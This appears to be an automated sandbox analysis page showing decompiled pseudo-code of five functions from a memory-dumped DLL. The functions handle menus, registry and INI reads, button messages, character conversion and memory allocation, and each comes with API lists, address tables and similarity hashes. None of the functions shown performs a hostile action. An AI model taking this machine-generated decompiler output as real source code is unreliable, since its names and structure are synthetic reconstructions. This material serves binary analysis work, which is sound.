Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: f878ff758ac08e7a2fe87b2da7bd0c34d9e5fd5aaf132f13d0e4f1c4a516438a
Instruction ID: 8a58e04e47ba1d8aab8944e44762f22b35a57a22c6947442d815a52f44b65ad2
Opcode Fuzzy Hash: f878ff758ac08e7a2fe87b2da7bd0c34d9e5fd5aaf132f13d0e4f1c4a516438a
Instruction Fuzzy Hash: 55F03030A00E19D6EF006BA1AC4D3AFBAB9FB84742F9249A0E5D2F1094DF3086B4C645

Uniqueness

Uniqueness Score: -1.00%

Function 100063F0, Relevance: 6.2, APIs: 4, Instructions: 216
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E100063F0(void* __ebx, signed int __ecx, void* __edi, void* __esi) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v36;
				struct HMENU__* _v40;
				struct HMENU__* _v44;
				signed int _v48;
				char _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr* _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				signed int _v152;
				char _v156;
				intOrPtr* _v160;
				CHAR* _v164;
				intOrPtr _v168;
				signed int _v176;
				signed int _v180;
				void* __ebp;
				signed int _t112;
				signed int _t115;
				signed int _t119;
				signed int _t127;
				struct HMENU__* _t128;
				signed int _t140;
				intOrPtr _t148;
				signed int _t214;
				void* _t221;
				signed int _t222;

				_t221 = __esi;
				_t220 = __edi;
				_t156 = __ebx;
				_push(0xffffffff);
				_push(0x10054d6a);
				_push( *[fs:0x0]);
				_t112 =  *0x1006d940; // 0xc2bf211
				_push(_t112 ^ _t222);
				 *[fs:0x0] =  &_v16;
				_v176 = __ecx;
				_t115 = _v176;
				_t226 =  *((intOrPtr*)(_t115 + 0xf8));
				if( *((intOrPtr*)(_t115 + 0xf8)) != 0) {
					E1001F53A( *((intOrPtr*)(_v176 + 0xf8)));
					_v72 =  *((intOrPtr*)(_v176 + 0xf8));
					_t119 = E1001F4E2(__ebx, _v72, __edi, CreatePopupMenu());
					__eflags = _t119;
					if(_t119 != 0) {
						goto L12;
					} else {
					}
				} else {
					_v64 = E100092FB(_t226, 0x1c);
					_v8 = 0;
					if(_v64 == 0) {
						_v180 = 0;
					} else {
						E10003E20(_v64);
						_v8 = 1;
						 *_v64 = 0x100609c4;
						E1001E59A(_v64 + 8);
						_v8 = 0;
						_v180 = _v64;
					}
					_v60 = _v180;
					_v8 = 0xffffffff;
					 *((intOrPtr*)(_v176 + 0xf8)) = _v60;
					_t119 = _v176;
					if( *((intOrPtr*)(_t119 + 0xf8)) == 0) {
					} else {
						_v68 =  *((intOrPtr*)(_v176 + 0xf8));
						_t119 = E1001F4E2(_t156, _v68, _t220, CreatePopupMenu());
						if(_t119 != 0) {
							L12:
							_v76 =  *((intOrPtr*)(_v176 + 0xf8));
							E1001E641(_v76 + 8, 0, 0xffffffff);
							_v40 =  *((intOrPtr*)(_v176 + 0xf8)) + 8;
							E100016F0( &_v52, E10009A54());
							_v8 = 2;
							__eflags = E100075B0(_v176 + 0xf4, _v40);
							if(__eflags < 0) {
								L14:
								_v8 = 0xffffffff;
								_t119 = E10001740( &_v52);
							} else {
								_t127 = E10007950(_t156, _v176 + 0xf4, _t220, _t221, __eflags, 0x8ba,  &_v52, 3, 0);
								__eflags = _t127;
								if(_t127 >= 0) {
									_t128 = _v40;
									_t173 =  *(_t128 + 8);
									_v44 =  *(_t128 + 8);
									_v56 = 0;
									while(1) {
										__eflags = _v56 - _v44;
										if(_v56 >= _v44) {
											break;
										}
										_v48 = 0;
										__eflags = _v56;
										if(__eflags < 0) {
											L20:
											E1000A5CD(_t156, _t173, _t220, _t221, __eflags);
										} else {
											_t173 = _v40;
											__eflags = _v56 -  *((intOrPtr*)(_v40 + 8));
											if(__eflags >= 0) {
												goto L20;
											}
										}
										_v152 =  *((intOrPtr*)(_v40 + 4)) + _v56 * 4;
										_v156 = _v52;
										_t186 = _v152;
										_t140 = E10007780(_v152, _v156);
										asm("sbb eax, eax");
										__eflags =  ~_t140 + 0x00000001 & 0x000000ff;
										if(( ~_t140 + 0x00000001 & 0x000000ff) != 0) {
											_t186 = _v48 | 0x00000008;
											__eflags = _t186;
											_v48 = _t186;
										}
										__eflags = _v56;
										if(__eflags < 0) {
											L25:
											E1000A5CD(_t156, _t186, _t220, _t221, __eflags);
										} else {
											__eflags = _v56 -  *((intOrPtr*)(_v40 + 8));
											if(__eflags >= 0) {
												goto L25;
											}
										}
										_v160 =  *((intOrPtr*)(_v40 + 4)) + _v56 * 4;
										_v164 =  *_v160;
										_v168 =  *((intOrPtr*)(_v176 + 0xf8));
										_t148 = _v168;
										_t173 =  *(_t148 + 4);
										AppendMenuA( *(_t148 + 4), _v48, _v56 + 0xc8, _v164);
										_t214 = _v56 + 1;
										__eflags = _t214;
										_v56 = _t214;
									}
									_v20 = E1000F66E(_v176);
									_t99 = _v20 + 0xe8; // 0xff0c8a8b
									 *((intOrPtr*)( *((intOrPtr*)( *_t99 + 0x184))))(2,  &_v36);
									E1000AF80(_v20 + 0xe8,  &_v36);
									__eflags = _v36 + 3;
									E1000D6AD( *((intOrPtr*)(_v176 + 0xf8)), _v36 + 3, 0, _v36 + 3, _v24, _v176, 0);
									_v8 = 0xffffffff;
									_t119 = E10001740( &_v52);
								} else {
									goto L14;
								}
							}
						} else {
						}
					}
				}
				 *[fs:0x0] = _v16;
				return _t119;
			}

0x100063f0
0x100063f0
0x100063f0
0x100063f3
0x100063f5
0x10006400
0x10006407
0x1000640e
0x10006412
0x10006418
0x1000641e
0x10006424
0x1000642b
0x100064ee
0x100064ff
0x1000650c
0x10006511
0x10006513
0x00000000
0x00000000
0x10006515
0x10006431
0x1000643b
0x1000643e
0x10006449
0x1000647a
0x1000644b
0x1000644e
0x10006453
0x1000645a
0x10006466
0x1000646b
0x10006472
0x10006472
0x1000648a
0x1000648d
0x1000649d
0x100064a3
0x100064b0
0x100064b2
0x100064be
0x100064cb
0x100064d2
0x1000651a
0x10006526
0x10006533
0x10006547
0x10006553
0x10006558
0x10006574
0x10006576
0x1000659a
0x1000659a
0x100065a4
0x10006578
0x10006591
0x10006596
0x10006598
0x100065ae
0x100065b1
0x100065b4
0x100065b7
0x100065c9
0x100065cc
0x100065cf
0x00000000
0x00000000
0x100065d5
0x100065dc
0x100065e0
0x100065ed
0x100065ed
0x100065e2
0x100065e2
0x100065e8
0x100065eb
0x00000000
0x00000000
0x100065eb
0x100065fe
0x10006607
0x10006614
0x1000661a
0x10006621
0x10006629
0x1000662b
0x10006630
0x10006630
0x10006633
0x10006633
0x10006636
0x1000663a
0x10006647
0x10006647
0x1000663c
0x10006642
0x10006645
0x00000000
0x00000000
0x10006645
0x10006658
0x10006666
0x10006678
0x10006693
0x10006699
0x1000669d
0x100065c3
0x100065c3
0x100065c6
0x100065c6
0x100066b3
0x100066c8
0x100066d4
0x100066e3
0x100066f8
0x1000670a
0x1000670f
0x10006719
0x00000000
0x00000000
0x00000000
0x10006598
0x00000000
0x100064d4
0x100064d2
0x100064b0
0x10006721
0x1000672c

APIs

CreatePopupMenu.USER32 ref: 10006502

Part of subcall function 100092FB: _malloc.LIBCMT ref: 10009319

DNameNode::DNameNode.LIBCMTD ref: 1000644E

Part of subcall function 100075B0: VariantInit.OLEAUT32(?), ref: 100075E2
Part of subcall function 100075B0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 10007670
Part of subcall function 100075B0: SafeArrayGetUBound.OLEAUT32(?,00000001,00000000), ref: 10007688
Part of subcall function 100075B0: SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 100076CA

Part of subcall function 10007950: VariantInit.OLEAUT32(000000FF), ref: 1000798C

CreatePopupMenu.USER32 ref: 100064C1
AppendMenuA.USER32 ref: 1000669D

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: ArrayMenuSafe$BoundCreateInitNamePopupVariant$AppendElementNodeNode::_malloc
String ID:
API String ID: 3156832600-0
Opcode ID: 56b83bfa017bbe42651024037e697ad11764dcecbe3c2b8dac702bd21becc6f8
Instruction ID: 0656a59e6cff921e6fbdaec847d389908c9978be37807ece08d2d816c3549594
Opcode Fuzzy Hash: 56b83bfa017bbe42651024037e697ad11764dcecbe3c2b8dac702bd21becc6f8
Instruction Fuzzy Hash: 7BA10674A00219DFEB14CB94CC90BADB7B2FF49344F2081A9E419AB385DB31AE85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 1001B634, Relevance: 6.1, APIs: 4, Instructions: 112
registryCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E1001B634(void* __ecx, intOrPtr _a4, CHAR* _a8, char* _a12, long _a16) {
				int* _v8;
				char _v16;
				signed int _v20;
				char _v4116;
				char _v4120;
				intOrPtr _v4124;
				CHAR* _v4128;
				int _v4132;
				long _v4136;
				void* _v4140;
				int _v4144;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				signed int _t46;
				CHAR* _t48;
				intOrPtr _t52;
				void* _t54;
				long _t58;
				char* _t69;
				intOrPtr _t70;
				intOrPtr _t79;
				long _t85;
				intOrPtr _t87;
				intOrPtr _t88;
				intOrPtr _t92;
				signed int _t93;

				_t71 = __ecx;
				_push(0xffffffff);
				_push(0x10052929);
				_push( *[fs:0x0]);
				E10042B70(0x1020);
				_t45 =  *0x1006d940; // 0xc2bf211
				_t46 = _t45 ^ _t93;
				_v20 = _t46;
				_push(_t46);
				 *[fs:0x0] =  &_v16;
				_t87 = _a4;
				_t85 = _a16;
				_t48 = _a8;
				_t69 = _a12;
				_v4124 = _t87;
				_v4128 = _t85;
				_v4136 = 0;
				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
					__eflags = _t85;
					if(_t85 == 0) {
						_v4128 = 0x100601db;
					}
					GetPrivateProfileStringA(_t48, _t69, _v4128,  &_v4116, 0x1000,  *(_t71 + 0x68));
					_push( &_v4116);
					goto L12;
				} else {
					_t54 = E1001B460(__ecx, _t48);
					_v4140 = _t54;
					if(_t54 != 0) {
						E10001670( &_v4120);
						_v8 = 0;
						_v4144 = 0;
						_v4132 = 0;
						_t58 = RegQueryValueExA(_v4140, _t69, 0,  &_v4144, 0,  &_v4132);
						_v4136 = _t58;
						__eflags = _t58;
						if(_t58 == 0) {
							_v4136 = RegQueryValueExA(_v4140, _t69, 0,  &_v4144, E10001850( &_v4120, _v4132),  &_v4132);
							E100071C0( &_v4120, 0xffffffff);
						}
						RegCloseKey(_v4140);
						_t79 = _v4124;
						__eflags = _v4136;
						if(__eflags != 0) {
							E100025B0(_t79, _v4128);
						} else {
							E10015626(_t79, __eflags,  &_v4120);
						}
						E10001020(_v4120 + 0xfffffff0);
						_t52 = _v4124;
					} else {
						_push(_v4128);
						L12:
						E100025B0(_t87);
						_t52 = _t87;
					}
				}
				 *[fs:0x0] = _v16;
				_pop(_t88);
				_pop(_t92);
				_pop(_t70);
				return E1003F29E(_t52, _t70, _v20 ^ _t93, _t85, _t88, _t92);
			}

0x1001b634
0x1001b639
0x1001b63b
0x1001b646
0x1001b64c
0x1001b651
0x1001b656
0x1001b658
0x1001b65e
0x1001b662
0x1001b668
0x1001b66b
0x1001b66e
0x1001b671
0x1001b676
0x1001b67c
0x1001b682
0x1001b68b
0x1001b775
0x1001b777
0x1001b779
0x1001b779
0x1001b79a
0x1001b7a6
0x00000000
0x1001b691
0x1001b692
0x1001b697
0x1001b69f
0x1001b6b2
0x1001b6d4
0x1001b6d7
0x1001b6dd
0x1001b6e3
0x1001b6e5
0x1001b6eb
0x1001b6ed
0x1001b721
0x1001b727
0x1001b727
0x1001b732
0x1001b738
0x1001b73e
0x1001b744
0x1001b76e
0x1001b746
0x1001b74d
0x1001b74d
0x1001b75b
0x1001b760
0x1001b6a1
0x1001b6a1
0x1001b7a7
0x1001b7a9
0x1001b7ae
0x1001b7ae
0x1001b69f
0x1001b7b3
0x1001b7bb
0x1001b7bc
0x1001b7bd
0x1001b7c9

APIs

RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,0C2BF211,?,?,?,?,10052929,000000FF), ref: 1001B6E3
RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,?,10052929,000000FF), ref: 1001B717
RegCloseKey.ADVAPI32(?,?,?,?,?,10052929,000000FF), ref: 1001B732
GetPrivateProfileStringA.KERNEL32(?,?,?,?,00001000,?), ref: 1001B79A

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: QueryValue$ClosePrivateProfileString
String ID:
API String ID: 1042844925-0
Opcode ID: c6c1de2252481c596d4ace2d37d8d7a093a6c11c4275b88d3aa444a60fc00b2c
Instruction ID: 9c562b03344bf0a7113f75a9fb370c42df3273b18552128ff1a190065ae20686
Opcode Fuzzy Hash: c6c1de2252481c596d4ace2d37d8d7a093a6c11c4275b88d3aa444a60fc00b2c
Instruction Fuzzy Hash: AC415A75D005A8EBDB21CF54CD849DEB7B8EB48390F00409AF589A7290D7B4AEC1DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 10012730, Relevance: 6.1, APIs: 4, Instructions: 104
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E10012730(void* __ecx, struct HWND__** _a4) {
				struct HWND__** _v8;
				struct HWND__** _v12;
				long _t31;
				struct HWND__** _t32;
				struct HWND__** _t44;
				struct HWND__** _t45;
				long _t47;
				void* _t49;
				struct HWND__** _t63;

				_push(__ecx);
				_push(__ecx);
				_t49 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x4c)) != 0) {
					_t31 = _a4;
					if(_t31 != 0) {
						if( *((intOrPtr*)(_t31 + 8)) == 0) {
							L4:
							_t32 = E10029F34( *((intOrPtr*)(_t49 + 0x4c)) + 0x40, _t31, 0);
							_v12 = _t32;
							_a4 = _t32;
							E1000CCA9( &_a4);
							while(_a4 != 0) {
								_t37 =  *((intOrPtr*)(E1000CCA9( &_a4)));
								_v8 =  *((intOrPtr*)(E1000CCA9( &_a4)));
								if((E100123C2(_t37) & 0x00020000) != 0) {
									break;
								} else {
									_t45 = _v8;
									if(_t45[2] == 0 || SendMessageA( *_t45, 0xf0, 0, 0) != 1) {
										continue;
									} else {
										L16:
										_t44 = _v8;
										goto L17;
									}
								}
								goto L18;
							}
							_a4 = _v12;
							_t31 = E100124DA( &_a4);
							while(_a4 != 0) {
								_t63 =  *(E100124DA( &_a4));
								_v8 = _t63;
								if(_t63[2] == 0) {
									L13:
									_t31 = E100123C2(_t63);
									if((_t31 & 0x00020000) == 0) {
										continue;
									}
								} else {
									if(SendMessageA( *_t63, 0xf0, 0, 0) == 1) {
										goto L16;
									} else {
										_t63 = _v8;
										goto L13;
									}
								}
								goto L18;
							}
						} else {
							_t47 = SendMessageA( *_t31, 0xf0, 0, 0);
							_t44 = _a4;
							if(_t47 == 1) {
								L17:
								_t31 = SendMessageA( *_t44, 0xf1, 0, 0);
							} else {
								goto L4;
							}
						}
						L18:
					}
				}
				return _t31;
			}

0x10012735
0x10012736
0x10012739
0x10012740
0x10012746
0x1001274b
0x1001275b
0x10012774
0x1001277c
0x10012784
0x10012787
0x10012791
0x100127d2
0x100127a7
0x100127ab
0x100127b8
0x00000000
0x100127ba
0x100127ba
0x100127c0
0x00000000
0x1001282d
0x1001282d
0x1001282d
0x00000000
0x1001282d
0x100127c0
0x00000000
0x100127b8
0x100127dd
0x100127e7
0x10012826
0x100127fd
0x100127ff
0x10012805
0x1001281a
0x1001281a
0x10012824
0x00000000
0x00000000
0x10012807
0x10012815
0x00000000
0x10012817
0x10012817
0x00000000
0x10012817
0x10012815
0x00000000
0x10012805
0x1001275d
0x10012766
0x1001276b
0x1001276e
0x10012830
0x10012839
0x00000000
0x00000000
0x00000000
0x1001276e
0x1001283b
0x1001283b
0x1001274b
0x1001283f

APIs

SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 10012766
SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 100127CB
SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 10012810
SendMessageA.USER32(?,000000F1,00000000,00000000), ref: 10012839

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 4dda4ca226725d10146b6bad15720443148468f757d7a22c1215735c4a275c43
Instruction ID: da4091c7b7b61771a1618a074e0e49fbca9688fa8722da63a9470184f46e57c8
Opcode Fuzzy Hash: 4dda4ca226725d10146b6bad15720443148468f757d7a22c1215735c4a275c43
Instruction Fuzzy Hash: 9C318FB0901219FFDB15CF91C891E9E7BA9EF41790F10806AF9099F251DA31EDD1DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1004DCD2, Relevance: 6.1, APIs: 4, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1004DCD2(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				int _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t73;

				_t73 = _a8;
				if(_t73 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t73 != 0) {
						E1003FB6E( &_v20, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E1004D035( *_t73 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E1004223E(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t65 =  *(_t56 + 0xac);
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								__eflags = _a12 -  *(_t56 + 0xac);
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t73[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t57 =  *(_t56 + 0xac);
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t73 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

0x1004dcdc
0x1004dce3
0x1004dcfa
0x00000000
0x1004dcea
0x1004dcec
0x1004dd06
0x1004dd0b
0x1004dd0e
0x1004dd11
0x1004dd3a
0x1004dd41
0x1004dd43
0x1004ddc4
0x1004dddf
0x1004dde1
0x1004dd21
0x1004dd21
0x1004dd24
0x1004dd26
0x1004dd29
0x1004dd29
0x1004dd29
0x1004dd29
0x00000000
0x1004dd2f
0x1004dda3
0x1004dda3
0x1004dda8
0x1004ddae
0x1004ddb1
0x1004ddb3
0x1004ddb6
0x1004ddb6
0x1004ddb6
0x1004ddb6
0x00000000
0x1004ddba
0x1004dd45
0x1004dd48
0x1004dd4e
0x1004dd51
0x1004dd78
0x1004dd7b
0x1004dd81
0x00000000
0x00000000
0x1004dd83
0x1004dd86
0x00000000
0x00000000
0x1004dd88
0x1004dd88
0x1004dd8e
0x1004dd91
0x1004dcff
0x1004dcff
0x1004dd9a
0x00000000
0x1004dd9a
0x1004dd53
0x1004dd56
0x00000000
0x00000000
0x1004dd5a
0x1004dd6b
0x1004dd71
0x1004dd73
0x1004dd76
0x00000000
0x00000000
0x00000000
0x1004dd76
0x1004dd13
0x1004dd16
0x1004dd18
0x1004dd1e
0x1004dd1e
0x00000000
0x1004dcee
0x1004dcee
0x1004dcf3
0x1004dcf7
0x1004dcf7
0x00000000
0x1004dcf3
0x1004dcec

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1004DD06
__isleadbyte_l.LIBCMT ref: 1004DD3A
MultiByteToWideChar.KERNEL32(00000080,00000009,1003F35A,?,00000000,00000000,?,?,?,?,1003F35A,00000000,?), ref: 1004DD6B
MultiByteToWideChar.KERNEL32(00000080,00000009,1003F35A,00000001,00000000,00000000,?,?,?,?,1003F35A,00000000,?), ref: 1004DDD9

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 278bb9ed021a18c73f9bac4a828722a88c06d954ab0a7787cdde24fad449ac9e
Instruction ID: 95f64726d1c925b87cffd524f8c3af31f4d32073d186ebc1b12deb53212be88c
Opcode Fuzzy Hash: 278bb9ed021a18c73f9bac4a828722a88c06d954ab0a7787cdde24fad449ac9e
Instruction Fuzzy Hash: 4831AE31A00296EFDB50EFA4C884AAE7BE6FF05250F2185BAE861CB191D370DD40DB54

Uniqueness

Uniqueness Score: -1.00%

Function 1002918E, Relevance: 6.1, APIs: 4, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E1002918E(void* __ecx, void* __edx, void* __edi, void* __eflags, signed int _a4) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t37;
				signed int _t39;
				void* _t47;
				intOrPtr* _t48;
				void* _t50;
				void* _t51;
				void* _t64;
				void* _t65;
				intOrPtr _t66;
				void* _t68;
				void* _t70;

				_t65 = __edi;
				_t64 = __edx;
				_t51 = E1001F13B(_t50, __ecx, __edi, _t68, __eflags);
				_t29 =  *((intOrPtr*)(_t51 + 0x10));
				if(_t29 == 0) {
					L19:
					return 0 |  *((intOrPtr*)(_t51 + 0x10)) != 0x00000000;
				}
				_t32 = _t29 - 1;
				 *((intOrPtr*)(_t51 + 0x10)) = _t32;
				if(_t32 != 0) {
					goto L19;
				}
				if(_a4 == 0) {
					L8:
					_push(_t65);
					_t66 =  *((intOrPtr*)(E1001F108(_t51, _t65, 0, _t77) + 4));
					_t70 = E10028758(0x1009430c);
					if(_t70 == 0 || _t66 == 0) {
						L18:
						goto L19;
					} else {
						_t35 =  *((intOrPtr*)(_t70 + 0xc));
						_t80 = _t35;
						if(_t35 == 0) {
							L12:
							if( *((intOrPtr*)(_t66 + 0x98)) != 0) {
								_t36 =  *((intOrPtr*)(_t70 + 0xc));
								_a4 = _a4 & 0x00000000;
								_t83 = _t36;
								if(_t36 != 0) {
									_push(_t36);
									_t39 = E1004306C(_t51, _t64, _t66, _t70, _t83);
									_push( *((intOrPtr*)(_t70 + 0xc)));
									_a4 = _t39;
									E1003F6C3(_t51, _t66, _t70, _t83);
								}
								_t37 = E1003F999(_t51, _t64, _t66,  *((intOrPtr*)(_t66 + 0x98)));
								 *((intOrPtr*)(_t70 + 0xc)) = _t37;
								if(_t37 == 0 && _a4 != _t37) {
									 *((intOrPtr*)(_t70 + 0xc)) = E1003F999(_t51, _t64, _t66, _a4);
								}
							}
							goto L18;
						}
						_push(_t35);
						if(E1004306C(_t51, _t64, _t66, _t70, _t80) >=  *((intOrPtr*)(_t66 + 0x98))) {
							goto L18;
						}
						goto L12;
					}
				}
				if(_a4 != 0xffffffff) {
					_t47 = E10017D5E();
					if(_t47 != 0) {
						_t48 =  *((intOrPtr*)(_t47 + 0x3c));
						_t77 = _t48;
						if(_t48 != 0) {
							 *_t48(0, 0);
						}
					}
				}
				E100290BB(_t51,  *((intOrPtr*)(_t51 + 0x20)), _t65);
				E100290BB(_t51,  *((intOrPtr*)(_t51 + 0x1c)), _t65);
				E100290BB(_t51,  *((intOrPtr*)(_t51 + 0x18)), _t65);
				E100290BB(_t51,  *((intOrPtr*)(_t51 + 0x14)), _t65);
				E100290BB(_t51,  *((intOrPtr*)(_t51 + 0x24)), _t65);
				goto L8;
			}

0x1002918e
0x1002918e
0x1002919a
0x1002919c
0x100291a3
0x1002927b
0x10029286
0x10029286
0x100291a9
0x100291aa
0x100291af
0x00000000
0x00000000
0x100291b8
0x100291fc
0x100291fc
0x10029202
0x1002920f
0x10029213
0x1002927a
0x00000000
0x10029219
0x10029219
0x1002921c
0x1002921e
0x1002922f
0x10029236
0x10029238
0x1002923b
0x1002923f
0x10029241
0x10029243
0x10029244
0x10029249
0x1002924c
0x1002924f
0x10029255
0x1002925c
0x10029262
0x10029267
0x10029277
0x10029277
0x10029267
0x00000000
0x10029236
0x10029220
0x1002922d
0x00000000
0x00000000
0x00000000
0x1002922d
0x10029213
0x100291be
0x100291c0
0x100291c7
0x100291c9
0x100291cc
0x100291ce
0x100291d2
0x100291d2
0x100291ce
0x100291c7
0x100291d7
0x100291df
0x100291e7
0x100291ef
0x100291f7
0x00000000

APIs

__msize.LIBCMT ref: 10029221
__msize.LIBCMT ref: 10029244
_malloc.LIBCMT ref: 1002925C
_malloc.LIBCMT ref: 10029271

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: __msize_malloc
String ID:
API String ID: 1288803200-0
Opcode ID: 9c1ecd89558127136b30157e12075d58641962e7fdfedea9b734469a27a6331e
Instruction ID: eed7ea3ca4dad72bd943c1112127a588968deadc88368116dafdc6d673bf36cf
